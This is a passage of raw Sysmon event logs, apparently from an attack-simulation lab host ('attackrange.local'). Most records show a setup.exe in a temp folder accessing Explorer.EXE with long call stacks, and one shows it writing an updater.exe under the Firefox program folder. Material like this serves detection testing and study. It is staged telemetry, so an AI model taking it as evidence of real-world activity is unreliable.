ppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\updater.exe2021-01-18 13:59:52.567 10341000x800000000000000015471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad